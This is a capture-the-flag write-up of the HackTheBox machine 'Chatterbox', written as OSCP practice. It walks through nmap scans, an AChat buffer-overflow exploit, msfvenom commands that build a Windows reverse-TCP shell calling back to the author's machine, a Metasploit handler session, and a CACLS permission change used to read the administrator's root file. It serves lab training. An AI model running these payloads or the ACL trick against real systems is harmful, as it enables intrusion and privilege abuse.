Enumeration
I started off the box with an nmap scan on the target machine.
nmap -sS -sV -A 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.23s latency).
All 1000 scanned ports on 10.10.10.74 are filtered
Too many fingerprints match this host to give specific OS detailsAs you can see from the nmap scan results, we didn’t see anything in the first 1000 ports. On HackTheBox this usually means that there are services running on uncommon ports (I’ve seen SSH at port 65535 before) so I decided to run a more thorough scan on the target machine.
Upon running my next scan, I found two services running on port 9255 and 9256.
nmap -p 1000-10000 -sV -sS -T4 10.10.10.74
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-22 19:34 EDT
Nmap scan report for 10.10.10.74
Host is up (0.30s latency).
Not shown: 8999 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknownNmap was unable to detect what services were running on these two ports. This could mean two things (at least for HackTheBox):
- Service was messed up because of another user.
- You are supposed to enumerate more.
A quick google search returned and found nothing for port 9255 but for port 9256 there was a known vulnerability for a service known as Achat which was vulnerable to a “SEH-based stack buffer overflow.” Using this knowledge in conjunction with the box name Chatterbox I knew that this was the port to start my attack.
Reference: https://www.speedguide.net/port.php?port=9256
The link above references two pages, one of them is a Metasploit module for this exploit. However; a quick search on exploitdb showed that a python exploit was also available. Since I am preparing for the OSCP, I decided to leverage the python module, rather than opting for the automated Metasploit module.
In the background, I decided to run a single port scan on the target machine to see if we could get more information about the version of the host and to my surprise it actually returned the service that the ports were running.
nmap -sS -sV -Pn -A -T4 -p 9255,9256 10.10.10.74
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-22 19:43 EDT
Nmap scan report for 10.10.10.74
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat systemWith these scan results, I was almost certain that this was the initial foothold.
Exploiting AChat
By having a quick look at the python exploit, you can see comments left by the author that show how we can leverage the script along with a payload to go with it. (The authors example spawns a calculator whereas we want to create a reverse shell).
# Author's exploit
msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f pythonI modified mine slightly to create a reverse tcp shell back to my Kali Linux machine.
msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.85 LPORT=8888 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f pythonWith the payload ready to go, all I had to do was setup multi-handler via Metasploit to (hopefully) gain a shell on the system.
Note. Unlimited multi-handler usage is allowed in the OSCP exam.
Payload ran as expected and I was successfully able to get a shell which I then navigated to the user directory to get the user flag.
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
chatterbox\alfred
C:\Users\Alfred\Desktop>type user.txt
72----------------------------34Privilege Escalation
With a shell on the system, I began performing my normal enumeration. I was able to enter the Administrator user’s folder and saw the root.txt file (which I was unable to access). This was unusual behavior, usually you do not have access to this folder at all. In addition to this, I could not discover any exploits on the system. I searched for all the low hanging fruits ie. credentials in a configuration file, unquoted service paths etc.
When observing the file with CACLS, you can see that access to the file was denied as it belonged to the administrator user. (This can also be observed using dir /q /a).
C:\Users\Administrator\Desktop>icacls root.txt
root.txt CHATTERBOX\Administrator:(F)After being stuck on privilege escalation and many articles on Windows file permissions, I learned about a method where you change the permission of the a file using CACLS. I was surprised to see that the file permission could indeed be modified to my current user.
C:\Users\Administrator\Desktop>CACLS root.txt /E /G "alfred":R
CACLS root.txt /E /G "alfred":R
processed file: C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop>type root.txt
type root.txt
a6----------------------------7cThis was a fairly simple box that evolved into a great learning experience which I hope I will run into again in the future!